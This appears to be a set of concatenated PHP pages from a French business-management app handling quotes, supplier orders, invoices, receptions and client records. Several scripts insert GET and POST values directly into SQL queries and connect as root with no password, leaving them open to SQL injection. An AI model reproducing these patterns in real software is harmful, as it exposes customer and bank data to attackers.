include ('../../../inc/pagecontainer.php');
?>
<!-- BEGIN PAGE CONTAINER-->
<div class="page-content">
<!-- BEGIN SAMPLE PORTLET CONFIGURATION MODAL FORM-->
<div id="portlet-config" class="modal hide">
<div class="modal-header">
<button data-dismiss="modal" class="close" type="button"></button>
<h3>Widget Settings</h3>
</div>
<div class="modal-body"> Widget settings form goes here </div>
</div>
<div class="clearfix"></div>
<div class="content">
<ul class="breadcrumb">
<li>
<p>VOUS ETES ICI</p>
</li>
<li><a href="#">ACHAT</a> </li>
<li><a href="index.devis.php">FACTURE</a></li>
<li><a href="nouv.client.php" class="active"><span class="semi-bold">Transfere en Facture</span></a></li>
</ul>
<div class="page-title"> <i class="icon-custom-left"></i>
<h3>ACHAT - <span class="semi-bold">Transfere en Facture</span></h3>
</div>
<?php
if($sql_facture_four == true){
?>
<div class="row">
<div class="col-md-12">
<div class="grid simple">
<div class="grid-body no-border">
<div class="row-fluid">
<div class="alert alert-block alert-success fade in">
<button data-dismiss="alert" class="close" type="button"></button>
<h4 class="alert-heading"><i class="icon-warning-sign"></i> SUCCES!</h4>
<p> La Facture Numéro FACFOUR000<?php echo $idreceptionfour; ?> à été transférer avec succès. </p>
</div>
</div>
</div>
</div>
</div>
</div>
<?php } ?>
<?php
if($sql_facture_four == false){
?>
<div class="row">
<div class="col-md-12">
<div class="grid simple">
<div class="grid-body no-border">
<div class="row-fluid">
<div class="alert alert-block alert-error fade in">
<button data-dismiss="alert" class="close" type="button"></button>
<h4 class="alert-heading"><i class="icon-warning-sign"></i> ERROR!</h4>
<p> Une Erreur de type <b><?php echo $error; ?></b> s'est produit. Vérifier votre Code. </p>
</div>
</div>
</div>
</div>
</div>
</div>
<?php } ?>
</div>
</div>
</div>
<!-- END CONTAINER -->
<!-- END CONTAINER -->
<!-- BEGIN CORE JS FRAMEWORK-->
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-1.8.3.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-ui/jquery-ui-1.10.1.custom.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/bootstrap/js/bootstrap.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/breakpoints.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-unveil/jquery.unveil.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-block-ui/jqueryblockui.js" type="text/javascript"></script>
<!-- END CORE JS FRAMEWORK -->
<!-- BEGIN PAGE LEVEL JS -->
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-slider/jquery.sidr.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-slimscroll/jquery.slimscroll.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/pace/pace.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-numberAnimate/jquery.animateNumbers.js" type="text/javascript"></script>
<!-- END PAGE LEVEL PLUGINS -->
<!-- BEGIN CORE TEMPLATE JS -->
<script src="<?php echo $rootsite; ?>assets/js/core.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/js/chat.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/js/demo.js" type="text/javascript"></script>
<!-- END CORE TEMPLATE JS -->
</body>
</html><file_sep><?php
mysql_connect("localhost", "root", "");
mysql_select_db("gestion");
$iddevisfour = $_GET['iddevisfour'];
//Import des élément de devis
$sql_devis_four = mysql_query("SELECT * FROM `devis_four` WHERE iddevisfour =".$iddevisfour);
$donnee_devis_four = mysql_fetch_array($sql_devis_four);
$idcmdfour = $donnee_devis_four['iddevisfour'];
$idfournisseur = $donnee_devis_four['idfournisseur'];
$date_cmd_four = $donnee_devis_four['date_devis_four'];
$art1 = $donnee_devis_four['art1'];
$art2 = $donnee_devis_four['art2'];
$art3 = $donnee_devis_four['art3'];
$art4 = $donnee_devis_four['art4'];
$art5 = $donnee_devis_four['art5'];
$art6 = $donnee_devis_four['art6'];
$art7 = $donnee_devis_four['art7'];
$art8 = $donnee_devis_four['art8'];
$art9 = $donnee_devis_four['art9'];
$art10 = $donnee_devis_four['art10'];
$art11 = $donnee_devis_four['art11'];
$art12 = $donnee_devis_four['art12'];
$qte1 = $donnee_devis_four['qte1'];
$qte2 = $donnee_devis_four['qte2'];
$qte3 = $donnee_devis_four['qte3'];
$qte4 = $donnee_devis_four['qte4'];
$qte5 = $donnee_devis_four['qte5'];
$qte6 = $donnee_devis_four['qte6'];
$qte7 = $donnee_devis_four['qte7'];
$qte8 = $donnee_devis_four['qte8'];
$qte9 = $donnee_devis_four['qte9'];
$qte10 = $donnee_devis_four['qte10'];
$qte11 = $donnee_devis_four['qte11'];
$qte12 = $donnee_devis_four['qte12'];
$pvht1 = $donnee_devis_four['pvht1'];
$pvht1 = $donnee_devis_four['pvht1'];
$pvht2 = $donnee_devis_four['pvht2'];
$pvht3 = $donnee_devis_four['pvht3'];
$pvht4 = $donnee_devis_four['pvht4'];
$pvht5 = $donnee_devis_four['pvht5'];
$pvht6 = $donnee_devis_four['pvht6'];
$pvht7 = $donnee_devis_four['pvht7'];
$pvht8 = $donnee_devis_four['pvht8'];
$pvht9 = $donnee_devis_four['pvht9'];
$pvht10 = $donnee_devis_four['pvht10'];
$pvht11 = $donnee_devis_four['pvht11'];
$pvht12 = $donnee_devis_four['pvht12'];
$port = $donnee_devis_four['port'];
$remise = $donnee_devis_four['remise'];
$eco_part = $donnee_devis_four['eco-part'];
$ptht_cmd_four = $donnee_devis_four['ptht_devis_four'];
$taxe_cmd_four = $donnee_devis_four['taxedevisfour'];
$ptttc_cmd_four = $donnee_devis_four['ptttc_devis_four'];
$sql_cmd_four = "INSERT INTO `cmd_four`(`idcmdfour`, `idfournisseur`, `date_cmd_four`, `etat_cmd_four`, `date_livraison_cmd_four`, `art1`, `qte1`, `art2`, `qte2`, `art3`, `qte3`, `art4`, `qte4`, `art5`, `qte5`, `art6`, `qte6`, `art7`, `qte7`, `art8`, `qte8`, `art9`, `qte9`, `art10`, `qte10`, `art11`, `qte11`, `art12`, `qte12`, `pvht1`, `pvht2`, `pvht3`, `pvht4`, `pvht5`, `pvht6`, `pvht7`, `pvht8`, `pvht9`, `pvht10`, `pvht11`, `pvht12`, `port`, `remise`, `eco-part`, `ptht_cmd_four`, `taxe_cmd_four`, `ptttc_cmd_four`)
VALUES ('','$idfournisseur','$date_cmd_four','1','','$art1','$qte1','$art2','$qte2','$art3','$qte3','$art4','$qte4','$art5','$qte5','$art6','$qte6','$art7','$qte7',
'$art8','$qte8','$art9','$qte9','$art10','$qte10','$art11','$qte11','$art12','$qte12','$pvht1','$pvht2','$pvht3','$pvht4','$pvht5','$pvht6','$pvht7','$pvht8','$pvht9','$pvht10','$pvht11',
'$pvht12','$port','$remise','$eco_part','$ptht_cmd_four','$taxe_cmd_four','$ptttc_cmd_four')";
mysql_query($sql_cmd_four);
include ('../../../inc/header.php');
include ('../../../inc/pagecontainer.php');
?>
<!-- BEGIN PAGE CONTAINER-->
<div class="page-content">
<!-- BEGIN SAMPLE PORTLET CONFIGURATION MODAL FORM-->
<div id="portlet-config" class="modal hide">
<div class="modal-header">
<button data-dismiss="modal" class="close" type="button"></button>
<h3>Widget Settings</h3>
</div>
<div class="modal-body"> Widget settings form goes here </div>
</div>
<div class="clearfix"></div>
<div class="content">
<ul class="breadcrumb">
<li>
<p>VOUS ETES ICI</p>
</li>
<li><a href="#">ACHAT</a> </li>
<li><a href="index.devis.php">DEVIS</a></li>
<li><a href="nouv.client.php" class="active"><span class="semi-bold">Transfere en Commande</span></a></li>
</ul>
<div class="page-title"> <i class="icon-custom-left"></i>
<h3>ACHAT - <span class="semi-bold">Transfere en commande</span></h3>
</div>
<?php
if($sql_cmd_four == true){
?>
<div class="row">
<div class="col-md-12">
<div class="grid simple">
<div class="grid-body no-border">
<div class="row-fluid">
<div class="alert alert-block alert-success fade in">
<button data-dismiss="alert" class="close" type="button"></button>
<h4 class="alert-heading"><i class="icon-warning-sign"></i> SUCCES!</h4>
<p> Le Commande Numéro CMDFOUR000<?php echo $iddevisfour; ?> à été transférer avec succès. </p>
</div>
</div>
</div>
</div>
</div>
</div>
<?php } ?>
<?php
if($sql_cmd_four == false){
?>
<div class="row">
<div class="col-md-12">
<div class="grid simple">
<div class="grid-body no-border">
<div class="row-fluid">
<div class="alert alert-block alert-error fade in">
<button data-dismiss="alert" class="close" type="button"></button>
<h4 class="alert-heading"><i class="icon-warning-sign"></i> ERROR!</h4>
<p> Une Erreur de type <b><?php echo $error; ?></b> s'est produit. Vérifier votre Code. </p>
</div>
</div>
</div>
</div>
</div>
</div>
<?php } ?>
</div>
</div>
</div>
<!-- END CONTAINER -->
<!-- END CONTAINER -->
<!-- BEGIN CORE JS FRAMEWORK-->
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-1.8.3.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-ui/jquery-ui-1.10.1.custom.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/bootstrap/js/bootstrap.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/breakpoints.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-unveil/jquery.unveil.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-block-ui/jqueryblockui.js" type="text/javascript"></script>
<!-- END CORE JS FRAMEWORK -->
<!-- BEGIN PAGE LEVEL JS -->
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-slider/jquery.sidr.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-slimscroll/jquery.slimscroll.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/pace/pace.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-numberAnimate/jquery.animateNumbers.js" type="text/javascript"></script>
<!-- END PAGE LEVEL PLUGINS -->
<!-- BEGIN CORE TEMPLATE JS -->
<script src="<?php echo $rootsite; ?>assets/js/core.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/js/chat.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/js/demo.js" type="text/javascript"></script>
<!-- END CORE TEMPLATE JS -->
</body>
</html><file_sep>
<?php include ('inc/header.php'); ?>
<?php include ('inc/pagecontainer.php'); ?>
<?php
// Chargement des calcule de vente et d'achat
$sql_total_vente = mysql_query("SELECT SUM(ptttc_fact_cli) as somme FROM fact_cli");
$donnee_total_vente = mysql_fetch_row($sql_total_vente);
$sql_total_achat = mysql_query("SELECT SUM(ptttc_fact_four) as somme FROM fact_four");
$donnee_total_achat = mysql_fetch_row($sql_total_achat);
?>
<div class="page-content">
<div class="content">
<!-- BEGIN PAGE TITLE -->
<div class="row">
<div class="col-md-6 col-vlg-6 col-sm-6">
<div class="tiles green added-margin m-b-20">
<div class="tiles-body">
<div class="controller"> <a class="reload" href="javascript:;"></a> <a class="remove" href="javascript:;"></a> </div>
<div class="tiles-title text-black">Ventes</div>
<div class="widget-stats">
<div class="wrapper transparent">
<span class="item-title">Total des Ventes</span> <span data-animation-duration="700" data-value="<?php echo $donnee_total_vente[0]; ?>€" class="item-count animate-number semi-bold">2,415€</span>
</div>
</div>
</div>
</div>
</div>
<div class="col-md-6 col-vlg-6 col-sm-6">
<div class="tiles blue added-margin m-b-20">
<div class="tiles-body">
<div class="controller"> <a class="reload" href="javascript:;"></a> <a class="remove" href="javascript:;"></a> </div>
<div class="tiles-title text-black">Achats </div>
<div class="widget-stats">
<div class="wrapper transparent">
<span class="item-title">Total des Achats</span> <span data-animation-duration="700" data-value="<?php echo $donnee_total_achat[0]; ?>€" class="item-count animate-number semi-bold">15,489</span>
</div>
</div>
</div>
</div>
</div>
</div>
<?php
$sql_vos_vente_total = mysql_query("SELECT SUM(ptttc_fact_cli) as somme FROM fact_cli WHERE iduser =" .$donnees_login['iduser']);
$donnee_vos_vente_total = mysql_fetch_row($sql_vos_vente_total);
$sql_vos_vente_aujourdhui = mysql_query("SELECT SUM(ptttc_fact_cli) as total FROM fact_cli WHERE (`iduser` = '".$donnees_login['iduser']."' AND `date_facture` = '".$date."')");
$donnee_vos_vente_aujourdui = mysql_fetch_row($sql_vos_vente_aujourdhui);
$sql_vos_vente_mois = mysql_query("SELECT SUM(ptttc_fact_cli) as date_mois FROM fact_cli WHERE date_facture BETWEEN '$date_mois_deb' AND '$date_mois_fin' AND iduser = ".$donnees_login['iduser']);
$donnee_vos_vente_mois = mysql_fetch_row($sql_vos_vente_mois);
?>
<div class="row">
<!-- BEGIN REALTIME SALES GRAPH -->
<div class="col-md-12 col-vlg-12 m-b-20 ">
<div class="tiles white added-margin">
<div class="row ">
<div class="p-t-35 p-l-45">
<div class="col-md-5 col-sm-5 no-padding">
<h5 class="no-margin">Vos Ventes totals</h5>
<h4><span data-animation-duration="700" data-value="<?php echo $donnee_vos_vente_total[0]; ?>" class="item-count animate-number semi-bold">0</span> EUR</h4>
</div>
<div class="col-md-3 col-sm-3 no-padding">
<p class="semi-bold">Aujourd'hui le <?php echo $date; ?></p>
<h4><span data-animation-duration="700" data-value="<?php echo $donnee_vos_vente_aujourdui[0]; ?>" class="item-count animate-number semi-bold">0</span> EUR</h4>
</div>
<div class="col-md-3 col-sm-3 no-padding">
<p class="semi-bold">Entre le <?php echo $date_mois_deb; ?> et le <?php echo $date_mois_fin; ?>
</p>
<h4><span data-animation-duration="700" data-value="<?php echo $donnee_vos_vente_mois[0]; ?>" class="item-count animate-number semi-bold">0</span> EUR</h4>
</div>
<div class="clearfix"></div>
</div>
</div>
<h5 class="semi-bold m-t-30 m-l-30">Dernière Ventes</h5>
<table class="table no-more-tables m-t-20 m-l-20 m-b-30">
<thead style="display:none">
<tr>
<th style="width:9%">N° Facture</th>
<th style="width:22%">Client</th>
<th style="width:6%">Montant</th>
<th style="width:1%"> </th>
</tr>
</thead>
<tbody>
<?php
$sql_derniere_facture = mysql_query("SELECT * FROM fact_cli, client WHERE fact_cli.idclient = client.idclient AND fact_cli.iduser = client.iduser");
while($donnee_derniere_facture = mysql_fetch_array($sql_derniere_facture))
{
?>
<tr>
<td class="v-align-middle bold text-success"><?php echo $donnee_derniere_facture['idfactcli']; ?></td>
<td class="v-align-middle"><span class="muted"><?php echo $donnee_derniere_facture['nom']; ?> <?php echo $donnee_derniere_facture['prenom']; ?></span> </td>
<td><span class="muted bold text-success"><?php echo $donnee_derniere_facture['ptttc_fact_cli']; ?> €</span> </td>
<td class="v-align-middle"></td>
</tr>
<?php } ?>
</tbody>
</table>
</div>
</div>
<!-- END REALTIME SALES GRAPH -->
</div>
</div>
</div>
<!-- END PAGE TITLE -->
<!-- BEGIN PlACE PAGE CONTENT HERE -->
<!-- END PLACE PAGE CONTENT HERE -->
</div>
</div>
<!-- END PAGE CONTAINER -->
</div>
<!-- END CONTENT -->
</body>
</html><file_sep><?php
mysql_connect("localhost", "root", "");
mysql_select_db("gestion");
$idfactfour = $_GET['idfactfour'];
$sql_fact_four = mysql_query("SELECT * FROM fact_four WHERE idfactfour =".$idfactfour);
$donnee_fact_four = mysql_fetch_array($sql_fact_four);
$etat_fact_four = $donnee_fact_four['etat_fact_four'];
//verification
include ('../../../inc/header.php');
include ('../../../inc/pagecontainer.php');
?>
<!-- BEGIN PAGE CONTAINER-->
<div class="page-content">
<!-- BEGIN SAMPLE PORTLET CONFIGURATION MODAL FORM-->
<div id="portlet-config" class="modal hide">
<div class="modal-header">
<button data-dismiss="modal" class="close" type="button"></button>
<h3>Widget Settings</h3>
</div>
<div class="modal-body"> Widget settings form goes here </div>
</div>
<div class="clearfix"></div>
<div class="content">
<ul class="breadcrumb">
<li>
<p>VOUS ETES ICI</p>
</li>
<li><a href="#">ACHAT</a> </li>
<li><a href="index.facture.php">FACTURE</a></li>
<li><a href="nouv.facture.php" class="active"><span class="semi-bold">Réglement facture</span></a></li>
</ul>
<div class="page-title"> <i class="icon-custom-left"></i>
<h3>ACHAT - <span class="semi-bold">Réglement Facture</span></h3>
</div>
<div class="row">
<div class="col-md-12">
<div class="grid simple">
<div class="grid-title no-border">
<h4>Facture - <span class="semi-bold">Réglement</span></h4>
<div class="tools"> <a class="collapse" href="javascript:;"></a> <a class="config" data-toggle="modal" href="#grid-config"></a> <a class="reload" href="javascript:;"></a> <a class="remove" href="javascript:;"></a> </div>
</div>
<div class="grid-body no-border">
<form action="valid.reg.facture.php" id="form_traditional_validation" novalidate="novalidate">
<div class="form-group">
<label class="form-label">Numéro de la Facture</label>
<div class="input-with-icon right">
<i class=""></i>
<input type="text" class="form-control" id="form1CardHolderName" name="idfactfour" value="<?php echo $donnee_fact_four['idfactfour']; ?>">
</div>
</div>
<div class="form-group">
<label class="form-label">Mode de Réglement</label>
<span class="help">Séléctionner le mode de reglement</span>
<div class="input-with-icon right">
<i class=""></i>
<select class="select2" name="mode_reglement">
<option value="1">Espèce</option>
<option value="2">CB Comptant</option>
<option value="3">CB 3 Fois</option>
<option value="4">Chèque Comptant</option>
<option value="5">Chèque 2 Fois</option>
<option value="6">Chèque 3 Fois</option>
<option value="7" disabled>Virement</option>
<option value="8" disabled>Prélèvement</option>
</div>
</div>
<div class="form-group">
<label class="form-label">Montant n°1</label>
<div class="input-with-icon right">
<i class=""></i>
<input type="text" class="form-control" id="form1CardHolderName" name="montant_reg1">
</div>
</div>
<div class="form-group">
<label class="form-label">Montant n°2</label>
<div class="input-with-icon right">
<i class=""></i>
<input type="text" class="form-control" id="form1CardHolderName" name="montant_reg2">
</div>
</div>
<div class="form-group">
<label class="form-label">Montant n°3</label>
<div class="input-with-icon right">
<i class=""></i>
<input type="text" class="form-control" id="form1CardHolderName" name="montant_reg3">
</div>
</div>
<div class="form-actions">
<div class="pull-right">
<button class="btn btn-success btn-cons" type="submit">Valider</button>
<button class="btn btn-white btn-cons" type="button">Cancel</button>
</div>
</div>
</form>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<!-- END CONTAINER -->
<!-- END CONTAINER -->
<!-- BEGIN CORE JS FRAMEWORK-->
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-1.8.3.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-ui/jquery-ui-1.10.1.custom.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/bootstrap/js/bootstrap.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/breakpoints.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-unveil/jquery.unveil.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-block-ui/jqueryblockui.js" type="text/javascript"></script>
<!-- END CORE JS FRAMEWORK -->
<!-- BEGIN PAGE LEVEL JS -->
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-slider/jquery.sidr.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-slimscroll/jquery.slimscroll.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/pace/pace.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-numberAnimate/jquery.animateNumbers.js" type="text/javascript"></script>
<!-- END PAGE LEVEL PLUGINS -->
<!-- BEGIN CORE TEMPLATE JS -->
<script src="<?php echo $rootsite; ?>assets/js/core.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/js/chat.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/js/demo.js" type="text/javascript"></script>
<!-- END CORE TEMPLATE JS -->
</body>
</html><file_sep><?php
include ('../../../inc/header.php');
include ('../../../inc/pagecontainer.php');
$date = date("d-m-Y");
$date_liv_poss = date('d-m-Y', strtotime("+2 days"));
?>
<!-- BEGIN PAGE CONTAINER-->
<div class="page-content">
<!-- BEGIN SAMPLE PORTLET CONFIGURATION MODAL FORM-->
<div id="portlet-config" class="modal hide">
<div class="modal-header">
<button data-dismiss="modal" class="close" type="button"></button>
<h3>Widget Settings</h3>
</div>
<div class="modal-body"> Widget settings form goes here </div>
</div>
<div class="clearfix"></div>
<div class="content">
<ul class="breadcrumb">
<li>
<p>VOUS ETES ICI</p>
</li>
<li><a href="#">ACHAT</a> </li>
<li><a href="index.reception.php" class="active">RECEPTION</a></li>
</ul>
<div class="page-title"> <a href="<?php echo $rootsite; ?>"><i class="icon-custom-left"></i></a>
<h3>Achat - <span class="semi-bold">RECEPTION</span></h3>
</div>
<div class="row-fluid">
<div class="span12">
<div class="grid simple ">
<div class="grid-title">
<h4>Liste des <span class="semi-bold">Reception Fournisseur</span></h4>
<a href="nouv.reception.php"><button class="btn btn-primary btn-cons" type="button"><i class="fa fa-plus"></i> Nouvelle Reception</button></a>
<div class="tools"> <a href="javascript:;" class="collapse"></a> <a href="#grid-config" data-toggle="modal" class="config"></a> <a href="javascript:;" class="reload"></a> <a href="javascript:;" class="remove"></a> </div>
</div>
<div class="grid-body ">
<table class="table table-striped" id="example2" >
<thead>
<tr>
<th>ID Commande</th>
<th>Date de reception</th>
<th>Fournisseur</th>
<th>Action</th>
<th></th>
<th HIDDEN>Etat</th>
</tr>
</thead>
<tbody>
<?php
$sql_reception_four = mysql_query("SELECT * FROM reception_four, fournisseur WHERE reception_four.idfournisseur = fournisseur.idfournisseur");
while($donnee_reception_four = mysql_fetch_array($sql_reception_four))
{
?>
<tr class="odd gradeX">
<td>RECFOUR000<?php echo $donnee_reception_four['idreceptionfour']; ?></td>
<td><?php echo $donnee_reception_four['date_reception_four']; ?></td>
<td><?php echo $donnee_reception_four['raison_social']; ?></td>
<td>
<a href="fiche.reception.php?idreceptionfour=<?php echo $donnee_reception_four['idreceptionfour']; ?>"><button class="btn btn-primary btn-cons" type="button"><i class="fa fa-eye"></i> Fiche Reception</button></a>
<a href="supp.reception.php?idreceptionfour=<?php echo $donnee_reception_four['idreceptionfour']; ?>"><button class="btn btn-primary btn-cons" type="button"><i class="fa fa-eraser"></i> Supprimer</button>
</td>
<td></td>
<td HIDDEN>
<?php
switch($donnee_reception_four['etat_reception_four'])
{
case 1:
echo "<p class='text-info'>Commande en cour de reception</p>";
break;
case 2:
echo "<p class='text-success'>Commande récéptionné</p>";
break;
case 3:
echo "<p class='text-success'>Transférer en Facture</p>";
break;
}
?>
</td>
</tr>
<?php } ?>
</tbody>
</table>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<!-- END PAGE -->
<!-- END CONTAINER -->
<!-- BEGIN CORE JS FRAMEWORK-->
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-1.8.3.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-ui/jquery-ui-1.10.1.custom.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/bootstrap/js/bootstrap.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/breakpoints.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-unveil/jquery.unveil.min.js" type="text/javascript"></script>
<!-- END CORE JS FRAMEWORK -->
<!-- BEGIN PAGE LEVEL JS -->
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-block-ui/jqueryblockui.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-slider/jquery.sidr.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-numberAnimate/jquery.animateNumbers.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-slimscroll/jquery.slimscroll.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/bootstrap-select2/select2.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-datatable/js/jquery.dataTables.min.js" type="text/javascript" ></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-datatable/extra/js/TableTools.min.js" type="text/javascript" ></script>
<script type="text/javascript" src="<?php echo $rootsite; ?>assets/plugins/datatables-responsive/js/datatables.responsive.js"></script>
<script type="text/javascript" src="<?php echo $rootsite; ?>assets/plugins/datatables-responsive/js/lodash.min.js"></script>
<!-- END PAGE LEVEL PLUGINS -->
<script src="<?php echo $rootsite; ?>assets/js/datatables.js" type="text/javascript"></script>
<!-- BEGIN CORE TEMPLATE JS -->
<script src="<?php echo $rootsite; ?>assets/js/core.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/js/chat.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/js/demo.js" type="text/javascript"></script>
<!-- END CORE TEMPLATE JS -->
<!-- END JAVASCRIPTS -->
</body>
</html>
<file_sep><?php
$idclient = $_POST['idclient'];
$civilite = $_POST['civilite'];
$iduser = $_POST['iduser'];
$nom = $_POST['nom'];
$prenom = $_POST['prenom'];
$adresse1 = $_POST['adresse1'];
$adresse2 = $_POST['adresse2'];
$cp = $_POST['cp'];
$ville = $_POST['ville'];
$tel = $_POST['tel'];
$fax = $_POST['fax'];
$port = $_POST['port'];
$mail = $_POST['mail'];
$raison_social = $_POST['raison_social'];
$num_siret = $_POST['num_siret'];
$num_tva = $_POST['num_tva'];
$code_banque = $_POST['code_banque'];
$code_guichet = $_POST['code_guichet'];
$code_cpt = $_POST['code_cpt'];
$cle_rib = $_POST['cle_rib'];
$mode_paiement_default = $_POST['mode_paiement_default'];
$encour = $_POST['encour'];
$iban = $_POST['iban'];
$bic = $_POST['bic'];
$mail_paypal = $_POST['mail_paypal'];
mysql_connect("localhost", "root", "");
mysql_select_db("gestion");
$sql_client = "UPDATE `client` SET `iduser`='$iduser',`raison_social`='$raison_social',`num_siret`='$num_siret',`num_tva`='$num_tva',`civilite`='$civilite',`nom`='$nom',`prenom`='$prenom',`adresse1`='$adresse1',
`adresse2`='$adresse2',`cp`='$cp',`ville`='$ville',`tel`='$tel',`fax`='$fax',`port`='$port',`mail`='$mail',`mode_paiement_default`='$mode_paiement_default',`code_banque`='$code_banque',`code_guichet`='$code_guichet',
`code_cpt`='$code_cpt',`cle_rib`='$cle_rib',`iban`='$iban',`bic`='$bic',`encour`='$encour',`mail_paypal`='$mail_paypal' WHERE idclient =".$idclient;
mysql_query($sql_client);
include ('../../../inc/header.php');
include ('../../../inc/pagecontainer.php');
?>
<!-- BEGIN PAGE CONTAINER-->
<div class="page-content">
<!-- BEGIN SAMPLE PORTLET CONFIGURATION MODAL FORM-->
<div id="portlet-config" class="modal hide">
<div class="modal-header">
<button data-dismiss="modal" class="close" type="button"></button>
<h3>Widget Settings</h3>
</div>
<div class="modal-body"> Widget settings form goes here </div>
</div>
<div class="clearfix"></div>
<div class="content">
<ul class="breadcrumb">
<li>
<p>VOUS ETES ICI</p>
</li>
<li><a href="#">Donnée</a> </li>
<li><a href="index.php">Client</a></li>
<li><a href="nouv.client.php" class="active"><span class="semi-bold">Modifier Client</span></a></li>
</ul>
<div class="page-title"> <i class="icon-custom-left"></i>
<h3>CLIENT - <span class="semi-bold">Modifier Client</span></h3>
</div>
<?php
if($sql_client == true){
?>
<div class="row">
<div class="col-md-12">
<div class="grid simple">
<div class="grid-body no-border">
<div class="row-fluid">
<div class="alert alert-block alert-success fade in">
<button data-dismiss="alert" class="close" type="button"></button>
<h4 class="alert-heading"><i class="icon-warning-sign"></i> SUCCES!</h4>
<p> Le client <b><?php echo $nom; ?> <?php echo $prenom; ?></b> à été Modifier avec succès. </p>
</div>
</div>
</div>
</div>
</div>
</div>
<?php } ?>
<?php
if($sql_client == false){
?>
<div class="row">
<div class="col-md-12">
<div class="grid simple">
<div class="grid-body no-border">
<div class="row-fluid">
<div class="alert alert-block alert-error fade in">
<button data-dismiss="alert" class="close" type="button"></button>
<h4 class="alert-heading"><i class="icon-warning-sign"></i> ERROR!</h4>
<p> Une Erreur de type <b><?php echo $error; ?></b> s'est produit. Vérifier votre Code. </p>
</div>
</div>
</div>
</div>
</div>
</div>
<?php } ?>
</div>
</div>
</div>
<!-- END CONTAINER -->
<!-- END CONTAINER -->
<!-- BEGIN CORE JS FRAMEWORK-->
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-1.8.3.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-ui/jquery-ui-1.10.1.custom.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/bootstrap/js/bootstrap.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/breakpoints.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-unveil/jquery.unveil.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-block-ui/jqueryblockui.js" type="text/javascript"></script>
<!-- END CORE JS FRAMEWORK -->
<!-- BEGIN PAGE LEVEL JS -->
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-slider/jquery.sidr.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-slimscroll/jquery.slimscroll.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/pace/pace.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-numberAnimate/jquery.animateNumbers.js" type="text/javascript"></script>
<!-- END PAGE LEVEL PLUGINS -->
<!-- BEGIN CORE TEMPLATE JS -->
<script src="<?php echo $rootsite; ?>assets/js/core.js" type="text/javascript"></script>
